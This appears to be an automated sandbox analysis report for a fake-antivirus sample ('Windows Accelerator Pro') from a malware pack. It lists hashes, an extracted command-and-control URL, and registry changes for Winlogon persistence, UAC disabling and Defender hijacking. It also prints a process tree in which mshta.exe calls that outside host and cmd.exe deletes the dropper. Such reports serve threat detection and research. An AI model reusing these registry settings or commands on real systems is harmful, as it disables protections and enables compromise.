Overview
overview
10Static
static
3eeeeeeeeee...00.exe
windows7-x64
eeeeeeeeee...um.exe
windows7-x64
10eeeeeeeeee...ug.exe
windows7-x64
6eeeeeeeeee...le.exe
windows7-x64
3eeeeeeeeee...er.exe
windows7-x64
7eeeeeeeeee...us.exe
windows7-x64
3MEMZ 3.0/MEMZ.bat
windows7-x64
7MEMZ 3.0/MEMZ.exe
windows7-x64
6eeeeeeeeee...MZ.bat
windows7-x64
7eeeeeeeeee...MZ.exe
windows7-x64
6eeeeeeeeee...ld.exe
windows7-x64
3eeeeeeeeee....A.exe
windows7-x64
6eeeeeeeeee...al.exe
windows7-x64
7eeeeeeeeee...15.exe
windows7-x64
3eeeeeeeeee...al.exe
windows7-x64
7eeeeeeeeee...0r.exe
windows7-x64
10eeeeeeeeee...ro.exe
windows7-x64
eeeeeeeeee...od.exe
windows7-x64
10eeeeeeeeee...ts.dll
windows7-x64
1eeeeeeeeee...ts.dll
windows7-x64
3eeeeeeeeee...ot.exe
windows7-x64
3Resubmissions
15-09-2024 23:12
240915-27aqvsxhjq 815-09-2024 23:02
240915-21efgaxake 815-09-2024 22:58
240915-2xypyaxdkj 315-09-2024 22:56
240915-2wn44sxcpk 315-09-2024 22:43
240915-2np2fawhpr 315-09-2024 22:42
240915-2m3k5swhmk 1015-09-2024 22:33
240915-2gqdmawbja 815-09-2024 22:27
240915-2de4gswekk 715-09-2024 22:15
240915-16esravenh 10Analysis
-
max time kernel
11s -
max time network
14s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15-09-2024 22:42
Static task
static1
Behavioral task
behavioral1
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/000/[email protected]
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/Antivirus Platinum/[email protected]
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/ColorBug/[email protected]
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/DesktopPuzzle/[email protected]
Resource
win7-20240903-en
Behavioral task
behavioral5
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/FakeActivation/[email protected]
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/Happy Antivirus/[email protected]
Resource
win7-20240903-en
Behavioral task
behavioral7
Sample
MEMZ 3.0/MEMZ.bat
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
MEMZ 3.0/MEMZ.exe
Resource
win7-20240903-en
Behavioral task
behavioral9
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/MEMZ 3.0 (1)/MEMZ 3.0/MEMZ.bat
Resource
win7-20240708-en
Behavioral task
behavioral10
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/MEMZ 3.0 (1)/MEMZ 3.0/MEMZ.exe
Resource
win7-20240903-en
Behavioral task
behavioral11
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/NavaShield/[email protected]
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/Petya.A/[email protected]
Resource
win7-20240708-en
Behavioral task
behavioral13
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/Security Central/[email protected]
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/Security Defender 2015/[email protected]
Resource
win7-20240903-en
Behavioral task
behavioral15
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/VineMEMZ-Original.exe
Resource
win7-20240704-en
Behavioral task
behavioral16
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/WannaCrypt0r/[email protected]
Resource
win7-20240708-en
Behavioral task
behavioral17
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/Windows Accelerator Pro/[email protected]
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/Winlocker.VB6.Blacksod/[email protected]
Resource
win7-20240903-en
Behavioral task
behavioral19
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/YouAreAnIdiot/AxInterop.ShockwaveFlashObjects.dll
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/YouAreAnIdiot/Interop.ShockwaveFlashObjects.dll
Resource
win7-20240729-en
Behavioral task
behavioral21
Sample
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/YouAreAnIdiot/YouAreAnIdiot.exe
Resource
win7-20240903-en
Errors
General
-
Target
eeeeeeeeeeeeee/Malware_pack_2/Malware_pack_2/Windows Accelerator Pro/[email protected]
-
Size
1023KB
-
MD5
981931159e45242cc1c3dcbdb47846d7
-
SHA1
875bd5c00a30df19216e7f08bc18d97490ed25a6
-
SHA256
69461917822ca791194992d7b7d01e12afbf0eb86ae327b3fb86df01012e060e
-
SHA512
ffad32e77bcd989a20e1226021280204ded3e4ba7987e02978859be966e454785a0c0e196397378ad47d57f251764aeade3836127fe94ef67800342591fc63ce
-
SSDEEP
24576:A+nV9M1Yek6EYqNc4p9cAnlwDUctAaxu190ryaJqc5D9X32pVa:A+nsr1E66eAnEUc6CuEryaJqc5RWpVa
Malware Config
Extracted
http://93.115.82.248/?0=1&1=1&2=9&3=i&4=7601&5=1&6=1111&7=vkpukwcwav
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\guard-vyxk.exe" guard-vyxk.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-vyxk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-vyxk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-vyxk.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 6 2580 mshta.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" guard-vyxk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe guard-vyxk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\Debugger = "svchost.exe" guard-vyxk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe guard-vyxk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\Debugger = "svchost.exe" guard-vyxk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe guard-vyxk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" guard-vyxk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe guard-vyxk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "svchost.exe" guard-vyxk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe guard-vyxk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger = "svchost.exe" guard-vyxk.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe guard-vyxk.exe -
Deletes itself 1 IoCs
pid Process 2836 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2844 guard-vyxk.exe -
Loads dropped DLL 2 IoCs
pid Process 296 [email protected] 296 [email protected] -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-vyxk.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 checkip.dyndns.org -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\services.msc guard-vyxk.exe File opened for modification C:\Windows\SysWOW64\eventvwr.msc guard-vyxk.exe File opened for modification C:\Windows\SysWOW64\diskmgmt.msc guard-vyxk.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language guard-vyxk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe 2844 guard-vyxk.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2844 guard-vyxk.exe Token: SeShutdownPrivilege 2844 guard-vyxk.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2844 guard-vyxk.exe 2844 guard-vyxk.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 2844 guard-vyxk.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 296 [email protected] 2844 guard-vyxk.exe 2844 guard-vyxk.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 296 wrote to memory of 2844 296 [email protected] 30 PID 296 wrote to memory of 2844 296 [email protected] 30 PID 296 wrote to memory of 2844 296 [email protected] 30 PID 296 wrote to memory of 2844 296 [email protected] 30 PID 296 wrote to memory of 2836 296 [email protected] 31 PID 296 wrote to memory of 2836 296 [email protected] 31 PID 296 wrote to memory of 2836 296 [email protected] 31 PID 296 wrote to memory of 2836 296 [email protected] 31 PID 2844 wrote to memory of 2580 2844 guard-vyxk.exe 33 PID 2844 wrote to memory of 2580 2844 guard-vyxk.exe 33 PID 2844 wrote to memory of 2580 2844 guard-vyxk.exe 33 PID 2844 wrote to memory of 2580 2844 guard-vyxk.exe 33 -
System policy modification 1 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System guard-vyxk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-vyxk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-vyxk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-vyxk.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" guard-vyxk.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\eeeeeeeeeeeeee\Malware_pack_2\Malware_pack_2\Windows Accelerator Pro\[email protected]"C:\Users\Admin\AppData\Local\Temp\eeeeeeeeeeeeee\Malware_pack_2\Malware_pack_2\Windows Accelerator Pro\[email protected]"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:296 -
C:\Users\Admin\AppData\Roaming\guard-vyxk.exeC:\Users\Admin\AppData\Roaming\guard-vyxk.exe2⤵
- Modifies WinLogon for persistence
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2844 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://93.115.82.248/?0=1&1=1&2=9&3=i&4=7601&5=1&6=1111&7=vkpukwcwav"3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2580
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EEEEEE~1\MALWAR~1\MALWAR~1\WINDOW~1\ENDERM~1.EXE" >> NUL2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:2836
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:2436
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:1312
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1023KB
MD5981931159e45242cc1c3dcbdb47846d7
SHA1875bd5c00a30df19216e7f08bc18d97490ed25a6
SHA25669461917822ca791194992d7b7d01e12afbf0eb86ae327b3fb86df01012e060e
SHA512ffad32e77bcd989a20e1226021280204ded3e4ba7987e02978859be966e454785a0c0e196397378ad47d57f251764aeade3836127fe94ef67800342591fc63ce